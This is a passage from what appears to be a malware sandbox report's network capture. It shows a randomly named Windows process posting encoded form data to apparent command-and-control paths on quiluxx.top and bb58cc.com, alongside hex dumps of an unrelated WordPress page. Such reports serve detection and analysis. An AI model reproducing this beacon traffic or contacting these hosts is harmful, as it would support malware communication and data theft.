                            Data Raw: 64 65 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e e6 9c aa e6 89 be e5 88 b0 e9 a1 b5 e9 9d a2 20 26 23 38 32 31 31 3b 20 77 6f 72 64 70 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 6f 6e 6c 61 6e 64 74 6f 79 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 [TRUNCATED]
                            Data Ascii: decf<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title> &#8211; wordpress</title><link rel='dns-prefetch' href='//www.onlandtoy.com' /><link rel="alternate" type="application/rss+xml" title="wordpress &raquo; Feed" href="http://www.onlandtoy.com/feed/" /><link rel="alternate" type="application/rss+xml" title="wordpress &raquo; Feed" href="http://www.onlandtoy.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.onlandtoy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file
                            Jul 16, 2024 07:23:10.928915977 CEST224INData Raw: 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74
                            Data Ascii: is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.
                            Jul 16, 2024 07:23:10.928946972 CEST1236INData Raw: 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73
                            Data Ascii: canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.hei
                            Jul 16, 2024 07:23:10.928981066 CEST1236INData Raw: 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e
                            Data Ascii: upports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(
                            Jul 16, 2024 07:23:10.929013014 CEST1236INData Raw: 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f
                            Data Ascii: return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp
                            Jul 16, 2024 07:23:10.929047108 CEST1236INData Raw: 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69
                            Data Ascii: -block-navigation .wp-block-navigation-item{background-color:inherit}</style><link rel='stylesheet' id='wp-block-navigation-css' href='http://www.onlandtoy.com/wp-includes/blocks/navigation/style.min.css?ver=6.5.2' media='all' /><style id='
                            Jul 16, 2024 07:23:10.929616928 CEST1236INData Raw: 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 3a 62 65 66 6f 72
                            Data Ascii: ing-mode]:where([style*=vertical-rl]){rotate:180deg}.is-style-asterisk:before {content: '';width: 1.5rem;height: 3rem;background: var(--wp--preset--color--contrast-2, currentColor);clip-path: path('M11.93.68
                            Jul 16, 2024 07:23:10.929651976 CEST1236INData Raw: 61 74 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 2e 34 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 36 38 3b 6d 61 72 67 69 6e 3a 2e
                            Data Ascii: at:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-left:.1em}p.has-drop-cap.has-background{overflow:hidden}
                            Jul 16, 2024 07:23:10.929685116 CEST1236INData Raw: 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 20 2e 77 70 2d 62 6c 6f
                            Data Ascii: margin-left:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{max-width:calc(100% - 100px)}.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{min-width:0!imp
                            Jul 16, 2024 07:23:10.929718971 CEST1236INData Raw: 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e
                            Data Ascii: wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-b
                            Jul 16, 2024 07:23:10.934163094 CEST1236INData Raw: 28 6d 69 6e 2d 77 69 64 74 68 3a 37 38 32 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e
                            Data Ascii: (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bot


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.449758203.161.41.205801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:16.853446960 CEST628OUTPOST /snq6/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.quiluxx.top
                            Origin: http://www.quiluxx.top
                            Referer: http://www.quiluxx.top/snq6/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 41 51 41 4a 75 4f 6d 79 48 2b 47 45 45 69 6c 30 32 36 6c 49 75 2f 52 59 6d 52 4c 6b 78 43 74 61 55 5a 6e 76 42 72 61 74 4f 4c 30 57 52 6f 65 36 69 70 76 6d 74 43 54 43 34 65 32 6c 56 62 52 66 38 77 77 61 78 6a 6a 77 34 4b 65 51 51 6c 52 4e 6e 64 59 49 59 48 6f 37 31 51 38 5a 6e 2b 35 58 61 6f 31 73 6e 69 45 79 51 35 6d 74 73 36 74 50 4d 7a 6b 75 35 4e 4c 4e 62 50 6b 49 6b 61 6a 39 41 57 76 32 41 7a 50 43 46 53 74 51 71 47 6c 72 42 58 38 37 4c 75 4e 74 6e 30 45 7a 63 68 46 53 71 42 6f 33 76 4f 33 58 76 54 41 48 58 30 33 5a 34 31 39 68 49 54 4d 47 37 78 47 39 7a 55 78 36 4d 51 3d 3d
                            Data Ascii: UbV=AQAJuOmyH+GEEil026lIu/RYmRLkxCtaUZnvBratOL0WRoe6ipvmtCTC4e2lVbRf8wwaxjjw4KeQQlRNndYIYHo71Q8Zn+5Xao1sniEyQ5mts6tPMzku5NLNbPkIkaj9AWv2AzPCFStQqGlrBX87LuNtn0EzchFSqBo3vO3XvTAHX03Z419hITMG7xG9zUx6MQ==
                            Jul 16, 2024 07:23:17.453159094 CEST533INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:17 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.449759203.161.41.205801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:19.386490107 CEST648OUTPOST /snq6/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.quiluxx.top
                            Origin: http://www.quiluxx.top
                            Referer: http://www.quiluxx.top/snq6/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 41 51 41 4a 75 4f 6d 79 48 2b 47 45 45 44 56 30 30 62 6c 49 6d 2f 52 66 36 68 4c 6b 6e 79 74 65 55 5a 72 76 42 72 7a 77 50 2b 6b 57 52 4e 69 36 6a 73 50 6d 75 43 54 43 68 75 32 73 59 37 52 75 38 77 30 73 78 6a 50 77 34 4b 4b 51 51 68 56 4e 6e 4b 74 65 61 58 6f 35 38 77 38 62 6f 65 35 58 61 6f 31 73 6e 69 34 55 51 35 4f 74 73 4b 64 50 64 6d 45 74 6e 64 4c 4f 59 50 6b 49 67 61 6a 35 41 57 76 59 41 78 37 6b 46 57 64 51 71 48 56 72 50 6a 49 34 45 75 4e 52 6a 30 46 5a 56 53 34 72 69 78 64 2f 6c 50 6a 59 73 54 55 71 53 79 6d 44 70 45 63 32 61 54 6f 31 6d 32 50 4a 2b 58 4d 7a 58 59 47 2f 6b 50 45 73 51 4d 4b 6c 74 6f 4e 78 54 4a 45 72 2f 54 6b 3d
                            Data Ascii: UbV=AQAJuOmyH+GEEDV00blIm/Rf6hLknyteUZrvBrzwP+kWRNi6jsPmuCTChu2sY7Ru8w0sxjPw4KKQQhVNnKteaXo58w8boe5Xao1sni4UQ5OtsKdPdmEtndLOYPkIgaj5AWvYAx7kFWdQqHVrPjI4EuNRj0FZVS4rixd/lPjYsTUqSymDpEc2aTo1m2PJ+XMzXYG/kPEsQMKltoNxTJEr/Tk=
                            Jul 16, 2024 07:23:19.976408958 CEST533INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:19 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.449760203.161.41.205801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:21.919085979 CEST10730OUTPOST /snq6/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.quiluxx.top
                            Origin: http://www.quiluxx.top
                            Referer: http://www.quiluxx.top/snq6/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 41 51 41 4a 75 4f 6d 79 48 2b 47 45 45 44 56 30 30 62 6c 49 6d 2f 52 66 36 68 4c 6b 6e 79 74 65 55 5a 72 76 42 72 7a 77 50 39 45 57 53 37 57 36 6a 4e 50 6d 76 43 54 43 70 4f 32 70 59 37 52 7a 38 78 52 6c 78 6a 7a 67 34 49 79 51 52 43 4e 4e 32 49 46 65 54 58 6f 35 2b 77 38 59 6e 2b 35 47 61 73 5a 6f 6e 69 49 55 51 35 4f 74 73 4a 46 50 4e 44 6b 74 6c 64 4c 4e 62 50 6c 61 6b 61 6a 42 41 56 66 75 41 78 76 72 46 6e 68 51 71 6e 46 72 44 32 38 34 62 65 4e 70 75 55 46 42 56 53 30 4b 69 78 42 5a 6c 50 57 31 73 52 49 71 65 56 4f 64 78 6c 56 75 4f 79 5a 73 33 42 7a 34 2b 6c 45 6d 49 4c 4f 56 70 2f 45 6d 44 59 61 6e 69 2f 34 46 57 4a 30 55 73 30 4b 78 6e 44 42 39 41 4b 73 69 51 36 54 37 43 44 52 4d 37 36 37 31 62 6b 59 6e 45 75 68 30 43 32 65 6f 6e 33 4a 58 43 4b 76 50 34 42 32 47 73 67 76 59 53 48 78 2b 6c 4f 4e 31 63 33 62 4a 4e 61 54 71 42 71 49 48 49 43 6d 53 62 4c 52 47 55 7a 31 70 33 6a 47 42 79 77 75 62 70 63 34 32 76 56 46 44 68 49 51 42 39 32 62 32 4e 61 72 76 61 61 39 74 75 67 66 4a 75 67 [TRUNCATED]
                            Data Ascii: UbV=AQAJuOmyH+GEEDV00blIm/Rf6hLknyteUZrvBrzwP9EWS7W6jNPmvCTCpO2pY7Rz8xRlxjzg4IyQRCNN2IFeTXo5+w8Yn+5GasZoniIUQ5OtsJFPNDktldLNbPlakajBAVfuAxvrFnhQqnFrD284beNpuUFBVS0KixBZlPW1sRIqeVOdxlVuOyZs3Bz4+lEmILOVp/EmDYani/4FWJ0Us0KxnDB9AKsiQ6T7CDRM7671bkYnEuh0C2eon3JXCKvP4B2GsgvYSHx+lON1c3bJNaTqBqIHICmSbLRGUz1p3jGBywubpc42vVFDhIQB92b2Narvaa9tugfJugR+Krbyl5bsofBevGR5j1R8a9EZzWd7t0V9nDotKPu6QBtOEYjav15ZcenK02IresEXGn7xN7CcESegogI3WP7O73Z+ZM6p9gOQGOmDBSlY9getkuYSFGLMovCuxILjZUVrtax19t2TT+uS/zHCkRjgzoft8Nu9NbEGSG5hvttHuIPuMOhxuEHKtihUDdJK26QlDN/ghqX2V5uBQnOPXAo4E4Cf3M9TBeUebFAVNfktdHTGZF2bTD9tIrObUcWkfkI/MFmPRyM7BVFumkNhHgABIpAe/vTXNKsxuZFiiihYDbxdvom1oRzWJiDjsulP8GSvHb+w2pyR1mWiMP49N3ZSNDKsy0REOPur8ZWCtvp5KrGPqdnD1PuvV64m+I+Hg7HXUQ7VoQCqy0whX9u/UgSoYgBMnfWlaREUlvBMdz0V0dA69o8YhEQPyRqvmwaHkcHRxLz0y2CwU922tKFdYWn+0/XzGHm/1GvUXiMIZW6G025khpqfJBzYwLv7kwVvNqMxrcq6QAstKTYyfY9FRd4PnKm752dNq5V+X2rQxIQRcrE7lZS8+kDvTyporksK3IWJwccrDPq0rDQyYtgYeEpSmEVXPYQuQCc1vAZp3l1CdykRFEpQUuYVIoNbGnMM/mosbgvcnPqVRYrt20xyWY7dtE4ivv7XwS2o [TRUNCATED]
                            Jul 16, 2024 07:23:22.534718990 CEST533INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:22 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.449761203.161.41.205801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:24.450658083 CEST365OUTGET /snq6/?UbV=NSopt7KlKYWZPRkA7oY6sPxNomLcvlV5CqP+M6qmG+AJc6mQ/tzSijSCkZiEOKdTyH8X5nOn6MDLSgA5+pRURkcx9XBmg+R/K4xPlWUgSqmVkrADB3U9/MQ=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.quiluxx.top
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:25.054506063 CEST548INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:24 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.449762103.176.91.154801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:30.110831022 CEST625OUTPOST /sq05/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.bb58cc.com
                            Origin: http://www.bb58cc.com
                            Referer: http://www.bb58cc.com/sq05/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 31 74 77 4a 37 46 79 77 52 38 2f 4b 47 6f 4a 2f 31 67 66 70 37 52 50 6b 68 76 6c 35 38 75 74 53 71 32 77 33 31 6d 49 5a 6f 45 4d 6d 34 4d 75 6a 47 67 4d 50 73 2b 57 50 48 64 78 41 73 78 37 38 63 31 31 6d 6e 71 67 50 61 47 6c 53 4f 45 6a 33 75 4b 44 70 45 48 76 37 58 36 63 31 38 45 74 4a 50 59 4d 4e 6b 48 62 50 78 77 59 32 63 69 48 75 66 43 32 69 74 79 52 78 68 37 65 7a 4e 52 36 45 38 72 2f 4b 78 51 71 63 6d 34 47 69 59 4d 76 5a 78 38 4b 32 65 4b 59 64 63 65 34 38 4e 35 57 51 4d 63 48 7a 76 55 6e 6b 75 63 4a 45 76 77 4d 63 30 39 6d 52 59 58 6f 58 64 45 6a 54 49 55 6f 4f 67 51 3d 3d
